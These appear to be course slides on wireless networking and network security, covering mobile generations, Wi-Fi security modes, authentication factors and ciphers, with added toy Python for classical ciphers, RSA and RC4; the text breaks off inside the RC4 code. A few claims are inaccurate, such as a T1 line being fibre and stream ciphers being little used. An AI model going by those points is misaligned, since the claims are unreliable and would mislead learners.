– Easy to set up / plan (no cabling required)
– Costs less
– Can be installed almost anywhere (no need to drill holes etc.)
– Allows mobility (computers don't have to stay in same place)
– Easy to add new participants to network
– Lot of public access points
– Flexibility and Convenience while the user is on the move
• Disadvantages:
– Traffic through network can be intercepted by unauthorized people
– Slow transmission speeds, high error rates
– Interference from other wireless stations, cables etc. can happen, reducing speed
– Affected by weather
– Health hazards
– Many different standards may not be compatible with each other (there are 5 different WLAN
standards). Making wireless access points compatible with each standard is complicated (different
antennas) and resource consuming, and can influence transmission speeds for individual participants.
• Wireless networks have led to changes in working patterns and social activities and have raised
health issues.
• Comparison of Ethernet and Wireless in terms of
reliability of transmission
– WIRELESS: the reliability of wireless depends on the strength
of the wireless signal / distance from the router; on the
topology/shape of the surroundings; on interference / the number
of simultaneous connections on an access point;
– ETHERNET: Ethernet is more reliable as the strength of the
signal is independent of the distance from the router; there
is no issue with the topology/shape of the surroundings, as long
as the user has a connection; the connection depends on the
condition of the cables – no loose or broken cable connections;
Hardware and software components of a
wireless network
• Wireless connections use radio waves or infrared signals to convey data.
• The key hardware components of a wireless computer network include:
– Modem to connect to the internet
– Wireless routers have a similar function to traditional routers for wired Ethernet networks.
A wireless router also acts as an access point, which allows data transfer between a device and a network.
– Wireless network adapters (or wireless NICs / wireless network cards) are required for
each device on a wireless network
– Wireless Access Points (WAP) allow a wireless network to join an existing wired
network.
– Wi-Fi wireless antennas, which access points and routers often utilize, significantly increase
the communication range of the wireless radio signal.
– Wireless repeaters connect to a router or access point. Also known as signal boosters or
range expanders, repeaters receive the signal and rebroadcast it.
– Ethernet to Wireless Access Point or Ethernet to wireless repeater – uses Ethernet
cables to carry signals to a wireless repeater or WAP
– Ethernet over power line to wireless repeater or WAP – uses power lines to carry the
signal
Hardware and software components of a
wireless network
• Software needed
– DHCP – Dynamic Host Configuration Protocol allows a server to automatically assign an IP address
to a client device
• When a wireless device enters the wireless network, it may acquire an IP address from the router
• DHCP can be disabled and each network device can be configured with a static IP address
– Software firewall
• Security system which determines what comes in and goes out
– Name / SSID – Service Set Identifier: a set of 32 alphanumeric characters, used to
differentiate one WLAN from another; case sensitive
– NIC drivers – device driver for the NIC card. This controls the hardware of the card; it is the translator
between the wireless card and the OS / application
– OS – handles system resources and is responsible for managing all the protocols, hardware and
applications
– Security software – all software that prevents unauthorized access. It includes access control,
firewall, anti-spyware, antivirus, cryptographic software, anti-keylogger, anti-tamper software,
anti-subversion software, intrusion detection system, intrusion prevention system and sandbox
– WAP – Wireless Application Protocol, for accessing information over a mobile wireless network. It
allows users to access the internet, exchange emails and surf the web. It is used in radio transceivers
and cellular phones
Characteristics of wireless networks
• Wi-Fi / WLAN
– Wi-Fi is short for wireless fidelity
– The standard for Wi-Fi is 802.11
– Creates local area networks that devices can connect to
– Also called Wireless LAN (WLAN) based on 802.11
– Short range network with high bandwidth
LAN – wired and wireless
• Difference in physical and data link protocols
• Access points function as the bridge
• Devices can stay connected as they roam from one place
to another. (Though actually the device has to move
across access points and that takes some time to
disconnect and reconnect)
• They have unique security considerations and specific
interoperability requirements
• Requires different hardware
• They offer performance that differs from wired LANs.
Points to consider
• How many users require mobility?
• What are the applications that will run over the WLAN? Helps to determine
bandwidth requirements
• Choose the right technology
– 802.11b offers interoperability; it is the slowest and least expensive standard. 802.11b
transmits in the 2.4 GHz frequency band of the radio spectrum. It can handle up to 11
megabits of data per second
– 802.11a – higher throughput per user. Limited interoperability. Transmits at 5 GHz and
can move up to 54 megabits of data per second.
– 802.11g transmits at 2.4 GHz like 802.11b, but it's a lot faster – it can handle up to 54
megabits of data per second.
– 802.11n (300 Mbps) and 802.11ac (1.2 Gbps) are the latest
• Data rate requirement
– Selecting only the highest data rate will require a greater number of APs to cover a
specific area
Two basic modes of 802.11 networks
• Infrastructure mode:
• each wireless client connects directly to a central device called
Access Point (AP)
• no direct connection between wireless clients
• AP acts as a wireless hub that performs the connections and
handles them between wireless clients
• AP handles:
• Client authentication,
• Authorization
• Link-level data security
• Ad-hoc mode:
• Each wireless client connects directly with each other
• No central device managing the connections
• Rapid deployment of a temporary network where no
infrastructure exists (an advantage in case of disaster…)
• Each node must maintain its own authentication list
Wireless communication
• 1G
– 1G refers to the first generation of wireless telephone
technology (mobile telecommunications), which was first
introduced in the 1980s and completed in the early 1990s.
– Its speed was up to 2.4 kbps; it allowed voice calls.
– It used analog signals, and AMPS was first launched in the USA as
a 1G mobile system
• Features
– Poor Voice Quality
– Poor Battery Life
– Large Phone Size
– No Security
– Limited Capacity
– Poor Handover
Wireless communication
• 2G
– 2G technology refers to the 2nd generation which is based on
GSM.
– It was launched in Finland in the year 1991 and used digital
signals.
– Its data speed was up to 64 kbps.
• Features include:
– services such as text messages, picture messages and MMS
(multimedia message)
– better quality and capacity.
• Drawbacks:
– 2G requires strong digital signals to help mobile phones work.
– Was unable to handle complex data such as Videos.
Wireless communication
• 2.5G is a technology between the second (2G)
and third (3G) generation of mobile telephony.
• It is sometimes described as 2G Cellular
Technology combined with GPRS.
• Features include:
– Phone Calls
– Send/Receive E-mail Messages
– Web Browsing
– Speed : 64-144 kbps
VoIP
• VoIP, or Voice over Internet Protocol, is a method for taking analog audio signals, like the kind
you hear when you talk on the phone, and turning them into digital data that can be transmitted
over the Internet.
• Usually, voice goes via circuit switched connections.
• In VoIP, voice goes via packet switched connections (voice converted to digital, broken down into
packets)
• Audio (and video) streams are transmitted over the internet; a broadband internet connection is needed
• It can be integrated into an office desktop computer, with collaboration desk
endpoints, webcams, widgets, touch screens, specific applications and IP phones
• Dependent on bandwidth and routers (QoS)
• Quality of service (QoS) is the description or measurement of the overall performance of a
service, such as a telephony or computer network or a cloud computing service, particularly the
performance seen by the users of the network.
• To quantitatively measure quality of service, several related aspects of the network service are
often considered, such as packet loss, bit rate, throughput, transmission delay, availability, jitter,
etc.
• Quality of service is the ability to provide different priority to different applications, users, or
data flows, or to guarantee a certain level of performance to a data flow.
Wireless communication
• 3G
– 3G technology refers to the third generation, which was introduced in the 2000s.
– Data transmission speed increased to 144 kbps – 2 Mbps.
– Handsets are typically called smartphones; the increased bandwidth and data transfer rates
accommodate web-based applications and audio and video files.
• Features Include:
– Providing Faster Communication
– More secure than 2G
– Send/Receive Large Email Messages
– High Speed Web / More Security
– Video Conferencing / 3D Gaming
– TV Streaming/ Mobile TV/ Phone Calls
– Large Capacities and Broadband Capabilities
• Drawbacks:
– Expensive fees for 3G licences and services
– It was a challenge to build the infrastructure for 3G
– High Bandwidth Requirement
– Expensive 3G Phones.
– Large Cell Phones
Wireless Access – Adv & Disadv
• An advantage is that users can access the network quickly with mobile
devices, anywhere in the building, without needing to be at a
workstation
• Users can log on with their own devices (if properly configured),
whose interface and functions they are more familiar with
• One disadvantage is security: if the network is not very secure, it
could be possible to reach the server from a nearby neighbourhood;
wireless is less secure than the cabled system in the building
• The wireless signal could be weak in some parts of the building,
leading to frustrated and ineffective employees
Wireless communication
• 4G
– 4G is short for fourth generation, which started in the late 2000s.
– Capable of providing 100 Mbps – 1 Gbps speed.
• Features Include:
– More Security
– High Speed
– High Capacity
– Low Cost Per-bit
• Drawbacks:
– Battery use is more
– Hard to implement
– Need complicated hardware
– Expensive equipment required to implement next generation
network.
Wireless communication
• LTE – Long Term Evolution
– Standard for wireless communication for high speed
data
– Download rates – 300 Mbps, upload rates – 5 Mbps
– LTE Advanced with more data capacity, two to three
times faster than today’s LTE, robust with fewer
dropped connections as you move around.
Wireless communication
• 5G
– 5G promises significantly faster data rates, higher connection density and much
lower latency, among other improvements
– Data rate of 1 Gbps – 20 Gbps
– Everyday devices connected, paving the way for IoT (Internet of Things)
– Started in the late 2010s.
– Complete wireless communication with almost no limitations.
– It is highly supportive of the WWWW (Wireless World Wide Web).
• Features include:
– High speed, high capacity
– 5G technology provides large-scale broadcasting of data in Gbps.
– Multimedia newspapers, watching TV programs with HD-quality clarity.
– Faster data transmission compared to previous generations.
– Large phone memory, dialing speed, clarity in audio/video.
– Support for interactive multimedia, voice, streaming video, Internet and other
– 5G is more effective and more attractive.
Parameters compared: 1G, 2G, 3G, 4G
• Location of first commercialization
– 1G: USA
– 2G: Finland
– 3G: Japan
– 4G: South Korea
• Technology
– 1G: AMPS (Advanced Mobile Phone System), NMT, TACS
– 2G: IS-95, GSM
– 3G: IMT2000, WCDMA
– 4G: LTE, WiMAX
• Switching type
– 1G: Circuit switching
– 2G: Circuit switching for Voice and Packet switching for Data
– 3G: Packet switching except for Air Interface
– 4G: Packet switching
• Speed (data rates)
– 1G: 2.4 Kbps to 14.4 kbps
– 2G: 14.4 Kbps
– 3G: 3.1 Mbps
– 4G: 100 Mbps
• Special Characteristic
– 1G: First wireless communication
– 2G: Digital version of 1G technology
– 3G: Digital broadband, speed increments
– 4G: Very high speeds, All IP
• Supports
– 1G: Voice only
– 2G: Voice and Data
– 3G: Voice and Data
– 4G: Voice and Data
• Internet service
– 1G: No Internet
– 2G: Narrowband
– 3G: Broadband
– 4G: Ultra Broadband
• Bandwidth
– 1G: Analog
– 2G: 25 MHz
– 3G: 25 MHz
– 4G: 100 MHz
• Advantage
– 1G: Simpler (less complex) network elements
– 2G: Multimedia features (SMS, MMS), Internet access and SIM introduced
– 3G: High security, international roaming
– 4G: Speed, High speed handoffs, MIMO technology, Global mobility
• Disadvantages
– 1G: Limited capacity, not secure, poor battery life, large phone size, background interference
– 2G: Low network range, slow data rates
– 3G: High power consumption, Low network coverage, High cost of spectrum licence
– 4G: Hard to implement, complicated hardware required
• Applications
– 1G: Voice Calls
– 2G: Voice calls, Short messages, browsing (partial)
– 3G: Video conferencing, mobile TV, GPS
– 4G: High speed applications, mobile TV, Wearable devices
Wireless communication
• WiMAX
– Worldwide Interoperability for Microwave Access
– Based on Wireless MAN technology
– IEEE 802.16
– Provide portable broadband connectivity
– standardized wireless version of Ethernet intended primarily as an
alternative to wire technologies (such as Cable Modems, DSL and T1 links)
to provide broadband access to customer premises.
– WiMAX would operate similar to WiFi, but at higher speeds over greater
distances and for a greater number of users.
– WiMAX has the ability to provide service even in areas that are difficult for
wired infrastructure to reach and the ability to overcome the physical
limitations of traditional wired infrastructure.
– Designed to make high quality, long range data and voice communications
affordable
– Maximum range is 30 miles
– Speed – about 40 Mbps
– WiMAX 2.0: 1 Gbps for fixed devices, 100 Mbps for mobile devices
– Better than WiFi in terms of range, scalability, bit rate and QoS
– Line of sight (LOS) offers more stability
• What Is DSL?
– Telephones are traditionally connected to a service
provider's network through a local loop -- a pair of twisted
copper wires.
– Human voices have a frequency range of 0 to 3,400 hertz,
but copper telephone wires have the ability to handle
frequencies up to several million hertz.
– DSL technology transfers digital data in frequency ranges
higher than 3,400 hertz, allowing a regular copper
telephone line to be used for both voice and data transfer.
• What Is a T1 Line?
– High speed
– dedicated four-wire fibre access
WIMAX vs LTE
• Both are considered 4G, all IP technology
• Different channels
• LTE is compatible with 3G and 2G, but WiMAX is
not
• Building an LTE network is more expensive
• LTE allows much greater speed for mobile
users
• WIMAX is not popular
Wireless networks
• Sensor networks
– Temperature, sound, pressure sensors placed at fixed
locations and are linked by wireless network to
perform distributed sensing tasks
– Used for environmental sampling, security &
surveillance, health care monitoring, underwater
measurements etc
Network Security - Problems
• Intruders, hackers, unauthorized users can
– Disable operations
– Disturb the privacy of legitimate users
– Gain unauthorized access
– Insert viruses or malicious code
– Launch denial of service attacks
– Steal identities
– Steal devices
– Steal sensitive information that is stored or transmitted
Encryption
• It uses complex mathematical algorithms and encryption keys to alter a
message into a form that is not understandable to an unauthorized
person.
• Only the person with the correct key can decode the message and read
it.
• Symmetric Key Encryption
– Single key encryption or secret key encryption
– Same key is used for encryption and decryption
– Each device has a secret code that is used to encrypt a packet
– The receiving device should know and use the same key to decode the packet
received.
– DES (Data Encryption Standard) uses a 56-bit key.
– 72057594037927936 possible combinations
– A brute-force attack by a modern computer can crack the code
– AES (Advanced Encryption Standard) uses 128-, 192- or 256-bit keys
– Uses fewer computer resources compared to public key encryption
Encryption
• Public Key Encryption
– Asymmetric Encryption
– Uses public key for encryption and private key for
decryption
– These two keys are mathematically linked
– This type of encryption is used on the internet
– Transport Layer Security (TLS) and Secure Socket
Layer (SSL) are based on public key encryption
– Messages take more time to encrypt and decrypt
– The authenticity of the public key needs to be
verified
Methods of Network Security
• Use user id & password to access
– weak passwords are easy to crack
– At least eight characters, a combination of numbers, upper case, lower case, symbols
• Install anti virus software
– To prevent, detect and remove malicious software
• Use a password to access the web interface that is used to setup the wireless routers or
access points
• Turn on / off wireless connectivity as required
• Enable / Disable SSID broadcast
– Wireless router or access point broadcasts its SSID.
– All wireless devices in range can identify it
– Force devices to enter the SSID manually by disabling the display of name
– But still a smart intruder can easily detect hidden wireless networks and sniffer tools can get the SSID
• Block access to wireless devices by MAC address
– Every NIC has a unique MAC address (12 hexadecimal digits, 48 bits)
– Example – 00:40:96:9d:68:16 (in hex format)
– Provide access to devices based on MAC addresses
– MAC spoofing becomes a problem
– All source MAC addresses are trusted when the Trusted MAC list is empty.
Different methods of network security
• Wireless Encryption
• Wired Equivalent Privacy (WEP)
– Often mistakenly referred to as the Wireless Encryption Protocol
– can be cracked by a malicious individual within minutes.
– Introduced in 1999 to provide data confidentiality
– 40/64 bit and 128 bit encryption key lengths
– Adds processing overheads that slow down the wireless connection
– It’s usually easily identifiable, since the password is generally a
series of hexadecimal characters (that is: 0–9, A–F).
– Easy to crack
– It offers interoperability with older devices
Different methods of network security
• Wireless Encryption
• Wi-Fi Protected Access (WPA)
• Adopted in 2003 by Wi-Fi alliance
• It’s more secure and more resource intensive.
• successor WPA2 (2004)
• The differences between WPA and WPA2 lie in the encryption
methods used, TKIP and AES respectively.
• Temporal Key Integrity Protocol (TKIP) dynamically changes keys
as the system is used
Different methods of network security
• Wi-Fi Protected Setup (WPS)
• Also called Quick Security Setup
• The goal of the protocol is to allow home users who know little of wireless security and may be
intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy
to add new devices to an existing network without entering long passphrases
• It requires a WPS router and WPS compatible devices.
• Should be switched off when not used
• Methods
– PIN method
  • The PIN has to be read from either a sticker or a display on the new wireless device.
  • This PIN must then be entered at the network's access point.
  • Alternately, a PIN provided by the access point may be entered into the new device.
– Push button method
  • The user has to push a button on both the access point and the new wireless client device.
– Near Field Communication method
  • The user has to bring the new client close to the access point to allow near field communication between the
devices.
– USB transfer method
  • The user uses a USB flash drive to transfer data between the new client device and the network's access point.
Different methods of network security
• Wireless Encryption
• Pre-shared Key (PSK)
• PSK is the most common method of securing a wireless network, mostly because
it’s the easiest to implement and doesn't require a separate authentication server.
• In this method, everyone on your secure wireless network connects to access
points utilizing the same password, which is probably known by everyone. For a
home environment, this is probably OK.
• You’d assume that most of the people you’re letting on your network are your
friends or family, and – depending on the quality of your friends and family – you
can probably trust them with access to your network.
• The trouble with PSK is, especially for businesses, that if you want to remove one
user’s access to your network, you need to give everybody else the new key.
• This may include all of your employees, contractors, and any other guests that
have been on your network.
• It could be a lot of work for a large company, especially if it’s all because of one
employee leaving the company.
Different methods of network security
• Firewall
– Its primary objective is to control the incoming and outgoing network traffic by
analysing the data packets and determining whether it should be allowed
through or not, based on a predetermined rule set.
– It may be hardware (Built in router firewall) or software.
• Intrusion detection system (IDS) is a passive detection system that can
detect the presence of an attack and logs/stores that information.
• Intrusion prevention system (IPS) is a network device that continually
scans across the network, searching for inappropriate activity and if a
potential threat is present, the IPS may shut it down.
• Prevent Physical Access
– Possible for a building to be shielded from electromagnetic interference
– Or Directional antennas can be used to restrict the spread of the signal
– Costs are more
• Use encryption software for sensitive information sent over the internet
• One factor authentication
• This is something that the user knows, such as a password.
• Advantages
• The access is unique, as only you know it.
• Also, this is a very easy way for you to access the network, since
all you do is input a password.
• Disadvantages
• The major one is that people generally use easy passwords
which are quite easy to guess or brute-force.
• Also, a lot of people have their unhashed passwords saved on
their website, meaning that it is quite easy to obtain them.
• Two factor authentication
• Two factor authentication requires something you have
and something you know.
• A second authentication factor enhances security by
introducing an independent type of ID, one only the
original person should be able to provide, such as a
thumb print or a swipe card.
• Example - Swiping a card and entering a PIN.
• Disadvantage
• If you lose one of these, you are not able to access.
• Three factor authentication
• In addition to the previous two factors, the third factor is
“something a user is.”
• Examples of a third factor are all biometric, such as the user’s
voice, hand configuration, a fingerprint, a retina scan or similar.
• The most recognized form of three-factor authentication is
usually the retina scan.
• An advantage of three factor authentication is that it is
obviously more secure than either of the other two
authentication schemes.
• Disadvantage - if you do not have access to one of them, you
are unable to gain access.
Block Vs Stream Cipher
• A block cipher is a method of encrypting text (to
produce ciphertext) in which a cryptographic key and
algorithm are applied to a block of data (for example,
64 contiguous bits) at once as a group rather than to
one bit at a time.
• A stream cipher is a method of encrypting text (to
produce ciphertext) in which a cryptographic key and
algorithm are applied to each binary digit in a data
stream, one bit at a time. This method is not much
used in modern cryptography.
DES (Symmetric)
• DES works by using the same key to encrypt and decrypt a message,
so both the sender and the receiver must know and use the same
private key.
• The Data Encryption Standard is a block cipher, meaning a
cryptographic key and algorithm are applied to a block of data
simultaneously rather than one bit at a time.
• To encrypt a plaintext message, DES groups it into 64-bit blocks.
• Each block is enciphered using the secret key into a 64-bit
ciphertext by means of permutation and substitution.
• The process involves 16 rounds and can run in four different modes,
encrypting blocks individually or making each cipher block
dependent on all the previous blocks.
• A round consists of several processing steps that include
substitution, transposition and mixing of the input plaintext, and
transforms it into the final output ciphertext
Substitution
• A substitution cipher is a method of encoding
by which units of plaintext are replaced with
ciphertext, according to a fixed system;
Transposition
• A transposition cipher is a method of
encryption by which the positions held by
units of plaintext (which are commonly
characters or groups of characters) are shifted
according to a regular system, so that the
ciphertext constitutes a permutation of the
plaintext.
• Example – Columnar Transposition
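An added worked example (not from the slides) of the two operations above: a monoalphabetic substitution cipher, and the columnar transposition cipher the slide names. The key alphabet and keyword used in the test are constructed; both ciphers are classical teaching ciphers with no security of their own.

```python
"""Substitution and columnar transposition, the two building blocks DES combines.
Added example; the sample key alphabet and keyword are constructed."""
import string

ALPHABET = string.ascii_uppercase


def substitution_encrypt(plaintext: str, key_alphabet: str) -> str:
    """Replace each letter by the letter at the same position in key_alphabet
    (the 'fixed system'). key_alphabet must be a permutation of A-Z; any
    character outside A-Z passes through unchanged."""
    if sorted(key_alphabet) != list(ALPHABET):
        raise ValueError("key_alphabet must be a permutation of A-Z")
    return plaintext.upper().translate(str.maketrans(ALPHABET, key_alphabet))


def substitution_decrypt(ciphertext: str, key_alphabet: str) -> str:
    """Inverse mapping: key letter -> plain letter."""
    return ciphertext.translate(str.maketrans(key_alphabet, ALPHABET))


def _column_order(keyword: str):
    """Columns are read out in alphabetical order of the keyword letters;
    equal letters are taken left to right (stable sort)."""
    return sorted(range(len(keyword)), key=lambda i: (keyword[i], i))


def columnar_encrypt(plaintext: str, keyword: str, pad: str = "X") -> str:
    """Write the text row by row under the keyword, pad the last row, then
    read the grid column by column in keyword order. The ciphertext is a
    permutation of the plaintext: no letter changes, only positions do."""
    cols = len(keyword)
    text = plaintext.replace(" ", "").upper()
    if len(text) % cols:
        text += pad * (cols - len(text) % cols)
    rows = [text[i:i + cols] for i in range(0, len(text), cols)]
    return "".join(row[c] for c in _column_order(keyword) for row in rows)


def columnar_decrypt(ciphertext: str, keyword: str) -> str:
    """Refill the columns in keyword order, then read the grid row by row.
    Padding characters are left in place for the caller to strip."""
    cols = len(keyword)
    if len(ciphertext) % cols:
        raise ValueError("ciphertext length must be a multiple of the keyword length")
    nrows = len(ciphertext) // cols
    grid = [""] * cols
    pos = 0
    for c in _column_order(keyword):
        grid[c] = ciphertext[pos:pos + nrows]
        pos += nrows
    return "".join(grid[c][r] for r in range(nrows) for c in range(cols))


if __name__ == "__main__":
    atbash = ALPHABET[::-1]                      # constructed substitution key
    print(substitution_encrypt("HELLO", atbash))  # SVOOL
    print(columnar_encrypt("WE ARE DISCOVERED FLEE AT ONCE", "ZEBRA"))
```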
DES (Symmetric)
• Decryption is simply the inverse of encryption, following the
same steps but reversing the order in which the keys are
applied.
• For any cipher, the most basic method of attack is brute force,
which involves trying each key until you find the right one.
• The length of the key determines the number of possible keys --
and hence the feasibility -- of this type of attack.
• DES uses a 64-bit key, but eight of those bits are used for parity
checks, effectively limiting the key to 56-bits.
• Hence, it would take a maximum of 2^56, or
72,057,594,037,927,936, attempts to find the correct key.
• Triple DES (3DES) performs three iterations of the DES algorithm
• 3DES encryption is obviously slower than plain DES.
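An added example (not from the slides) making the parity-bit claim above concrete: each of the eight DES key bytes carries one odd-parity bit in its low-order position, so stripping them leaves the 56 effective bits and the 2^56 key space quoted above. The sample key in the test is a constructed value.

```python
"""DES key parity: 64 key bits, 8 of which are parity, 56 effective.
Added example; sample keys are constructed."""

DES_KEYSPACE = 2 ** 56          # 72,057,594,037,927,936 keys, as on the slide


def has_odd_parity(byte: int) -> bool:
    """DES convention: every key byte has an odd number of 1 bits."""
    return bin(byte).count("1") % 2 == 1


def check_des_key_parity(key: bytes) -> bool:
    """True if all 8 bytes of the key satisfy odd parity."""
    if len(key) != 8:
        raise ValueError("a DES key is exactly 8 bytes (64 bits)")
    return all(has_odd_parity(b) for b in key)


def fix_des_key_parity(key: bytes) -> bytes:
    """Rewrite the least-significant bit of each byte so that byte has odd
    parity. The 7 high-order bits, the ones that matter for security, are
    untouched, which is why the parity bits add nothing to the key space."""
    if len(key) != 8:
        raise ValueError("a DES key is exactly 8 bytes (64 bits)")
    fixed = bytearray()
    for b in key:
        seven = b & 0xFE                       # drop the parity position
        fixed.append(seven | (0 if has_odd_parity(seven) else 1))
    return bytes(fixed)


def effective_key_bits(key: bytes) -> int:
    """Pack the 7 non-parity bits of each byte into one 56-bit integer."""
    value = 0
    for b in key:
        value = (value << 7) | (b >> 1)
    return value


if __name__ == "__main__":
    k = bytes.fromhex("133457799BBCDFF1")    # constructed sample key
    print(check_des_key_parity(k), hex(effective_key_bits(k)))
```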
AES (Symmetric)
• The Advanced Encryption Standard or AES is a symmetric block cipher
• AES is more secure than its predecessors -- DES and 3DES -- as the
algorithm is stronger and uses longer key lengths.
• It also enables faster encryption than DES and 3DES, making it ideal
for software applications, firmware and hardware that require either
low-latency or high throughput, such as firewalls and routers.
• It is used in many protocols such as SSL/TLS and can be found in most
modern applications and devices that need encryption functionality.
• AES comprises three block ciphers, AES-128, AES-192 and AES-256.
Each cipher encrypts and decrypts data in blocks of 128 bits using
cryptographic keys of 128-, 192- and 256-bits, respectively.
• There are 10 rounds for 128-bit keys, 12 rounds for 192-bit keys, and
14 rounds for 256-bit keys.
RSA (Public)
• RSA is a cryptosystem for public-key encryption, and is widely used for securing
sensitive data, particularly when being sent over an insecure network such as the
Internet.
• In RSA cryptography, both the public and the private keys can encrypt a message; the
opposite key from the one used to encrypt a message is used to decrypt it.
• This attribute is one reason why RSA has become the most widely used asymmetric
algorithm
• It provides a method of assuring the confidentiality, integrity, authenticity and non-
repudiability of electronic communications and data storage
• Nonrepudiation is a way to guarantee that the sender of a message cannot later deny
having sent the message and that the recipient cannot deny having received the
message.
• RSA derives its security from the difficulty of factoring large integers that are the
product of two large prime numbers.
• Multiplying these two numbers is easy, but determining the original prime numbers
from the total -- factoring -- is considered infeasible due to the time it would take
even using today’s super computers.
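An added worked example (not from the slides) of textbook RSA with small primes: key generation, the property that either key encrypts and the other decrypts, and why the security rests on factoring n. The primes 61 and 53 are a constructed toy; real RSA uses moduli of 2048 bits or more together with padding, so this block is for understanding only.

```python
"""Textbook RSA on toy primes. Added example; p, q and the message are constructed."""
from math import gcd


def modinv(a: int, m: int) -> int:
    """Extended Euclid: return x such that (a * x) % m == 1."""
    r0, r1, x0, x1 = a, m, 1, 0
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        x0, x1 = x1, x0 - q * x1
    if r0 != 1:
        raise ValueError("no inverse: gcd(a, m) != 1")
    return x0 % m


def generate_keypair(p: int, q: int, e: int = 65537):
    """Public key (n, e), private key (n, d) with e*d == 1 mod phi(n)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    return (n, e), (n, modinv(e, phi))


def rsa_apply(key, m: int) -> int:
    """m^k mod n: with the public key this encrypts (or verifies), with the
    private key it decrypts (or signs). Same operation either way."""
    n, k = key
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, k, n)


def factor_by_trial_division(n: int):
    """Feasible for this toy n; hopeless for a real-size modulus."""
    f = 2
    while f * f <= n:
        if n % f == 0:
            return f, n // f
        f += 1
    raise ValueError("n has no non-trivial factor")


def recover_private_key(n: int, e: int):
    """Whoever can factor n recovers d: this is the whole security argument."""
    p, q = factor_by_trial_division(n)
    return n, modinv(e, (p - 1) * (q - 1))


PUBLIC, PRIVATE = generate_keypair(61, 53, e=17)   # n = 3233, constructed toy


def round_trip(m: int):
    """Return (ciphertext, signature) and check both directions decrypt."""
    c = rsa_apply(PUBLIC, m)             # encrypt with the public key
    assert rsa_apply(PRIVATE, c) == m    # only the private key decrypts it
    s = rsa_apply(PRIVATE, m)            # "encrypt" with the private key = sign
    assert rsa_apply(PUBLIC, s) == m     # anyone with the public key verifies
    return c, s


if __name__ == "__main__":
    print(PUBLIC, PRIVATE, round_trip(65))
```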
SSL
• The Secure Sockets Layer (SSL) is a computer networking protocol
that manages server authentication, client authentication and
encrypted communication between servers and clients.
• SSL uses a combination of public-key and symmetric-key
encryption to secure a connection between two machines,
typically a Web or mail server and a client machine,
communicating over the Internet or an internal network.
• Using the OSI reference model as context, SSL runs above the
TCP/IP protocol, which is responsible for the transport and
routing of data over a network, and below higher-level protocols
such as HTTP and IMAP, encrypting the data of network
connections in the application layer of the Internet Protocol suite.
SSL
• The SSL protocol includes two sub-protocols: the record protocol and the "handshake"
protocol.
• These protocols allow a client to authenticate a server and establish an encrypted SSL
connection.
• In what's referred to as the "initial handshake process," a server that supports SSL
presents its digital certificate to the client to authenticate the server's identity.
• The authentication process uses public-key encryption to validate the digital certificate
and confirm that a server is in fact the server it claims to be.
• Once the server has been authenticated, the client and server establish cipher settings
and a shared key to encrypt the information they exchange during the remainder of the
session.
• This provides data confidentiality and integrity.
• This whole process is invisible to the user.
• For example, if a webpage requires an SSL connection, the URL will change from HTTP to
HTTPS and a padlock icon appears in the browser once the server has been authenticated.
• The handshake also allows the client to authenticate itself to the server. In this case, after
server authentication is successfully completed, the client must present its certificate to
the server to authenticate the client's identity before the encrypted SSL session can be
established.
TLS
• Transport Layer Security (TLS) is a protocol that ensures privacy
between communicating applications and their users on the Internet.
• When a server and client communicate, TLS ensures that no third
party may eavesdrop or tamper with any message.
• TLS is the successor to the Secure Sockets Layer (SSL).
• TLS is composed of two layers: the TLS Record Protocol and the TLS
Handshake Protocol.
• The TLS Handshake Protocol allows the server and client to
authenticate each other and to negotiate an encryption algorithm
and cryptographic keys before data is exchanged.
• The TLS Record Protocol provides connection security with some
encryption method such as the Data Encryption Standard (DES).
• The TLS Record Protocol can also be used without encryption.
SSL vs TLS
• There are two distinct ways that a program can initiate a secure connection with a
server:
• By Port (a.k.a. explicit):
– Connecting to a specific port means that a secure connection should be used.
– For example, port 443 for https (secure web), 993 for secure IMAP, 995 for secure POP, etc.
– These ports are setup on the server ready to negotiate a secure connection first, and do
whatever else you want second.
• By Protocol (a.k.a. implicit):
– These connections first begin with an insecure “hello” to the server and only then switch to
secured communications after the handshake between the client and the server is
successful.
– If this handshake fails for any reason, the connection is severed.
– A good example of this is the command “STARTTLS” used in outbound email (SMTP)
connections.
• The “By Port” method is commonly referred to as “SSL” or “explicit” and the “By
Protocol” method is commonly referred to as “TLS” or “implicit” in many program
configuration areas.
Initialization Vector
• An initialization vector (IV) is an arbitrary number that can be used along with a secret
key for data encryption.
• This number, also called a nonce, is employed only one time in any session.
• The use of an IV prevents repetition in data encryption, making it more difficult for a
hacker using a dictionary attack to find patterns and break a cipher.
• For example, a sequence might appear twice or more within the body of a message.
• If there are repeated sequences in encrypted data, an attacker could assume that the
corresponding sequences in the message were also identical.
• The IV prevents the appearance of corresponding duplicate character sequences in the
ciphertext.
• The ideal IV is a random number that is made known to the destination computer to
facilitate decryption of the data when it is received.
• The IV can be agreed on in advance, transmitted independently or included as part of
the session setup prior to exchange of the message data.
• The length of the IV (the number of bits or bytes it contains) depends on the method of
encryption.
• The IV length is usually comparable to the length of the encryption key or block of the
cipher in use.
• IV changes for every block of data
RC4
• RC4 (Rivest Cipher 4) is a stream cipher.
• While remarkable for its simplicity and speed in software,
multiple vulnerabilities have been discovered in RC4,
rendering it insecure.
• Particularly problematic uses of RC4 have led to very
insecure protocols such as WEP.
• RC4 generates a pseudorandom stream of bits (a keystream).
• As with any stream cipher, these can be used for encryption
by combining it with the plaintext using bit-wise exclusive-or
• Decryption is performed the same way
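An added example (not from the slides) serving both the Initialization Vector and RC4 sections: a minimal RC4 keystream generator, showing that encryption and decryption are the same XOR, that reusing one keystream without an IV lets two ciphertexts cancel to the XOR of their plaintexts (the repetition the IV section warns about), and that a per-message IV gives each message a fresh keystream. The 3-byte IV length and the messages are constructed; RC4 is broken and appears here only because the slides discuss it.

```python
"""RC4 keystream, XOR encryption, and why an IV is needed. Added example;
IV length, keys and messages are constructed sample values."""

IV_LEN = 3   # constructed: WEP also used a 24-bit IV


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Key-scheduling algorithm (KSA) followed by the PRGA output loop."""
    if not key:
        raise ValueError("key must be non-empty")
    S = list(range(256))
    j = 0
    for i in range(256):                                   # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                                # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
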